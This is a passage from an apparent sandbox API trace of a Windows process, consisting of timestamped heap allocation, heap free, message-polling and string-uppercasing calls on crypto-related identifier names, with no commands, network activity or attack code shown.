dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0240.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xccb) returned 0x3bf0dd8 [0240.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe59020 | out: hHeap=0x970000) returned 1 [0240.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0240.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0240.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0240.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0240.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0240.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xccb) returned 0x3bf1ab0 [0240.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0240.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.536] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0240.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0240.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0240.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0240.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0240.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xccb) returned 0x3bf0dd8 [0240.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0240.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0240.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0240.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0240.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0240.537] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0240.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0240.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0240.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0240.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0240.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0240.538] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0240.538] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0240.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0240.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xccb) returned 0x3bf0dd8 [0240.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55038 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0240.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550c8 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xccb) returned 0x3bf2788 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0240.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0240.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0240.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0240.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0240.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0240.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.541] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0240.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.541] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0240.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0240.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0240.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0240.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0240.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0240.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0240.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0240.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0240.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0240.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0240.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.590] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0240.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0240.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0240.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0240.591] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.591] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0240.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0240.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0240.591] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0240.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.591] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0240.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0240.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0240.592] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0240.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0240.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0240.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0240.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0240.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0240.592] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0240.636] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0240.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.637] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0240.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0240.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0240.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0240.637] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0240.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.637] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0240.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0240.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0240.637] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0240.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0240.637] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0240.638] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0240.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0240.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0240.638] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0240.638] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0240.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0240.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0240.639] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.639] RtlAllocateHeap 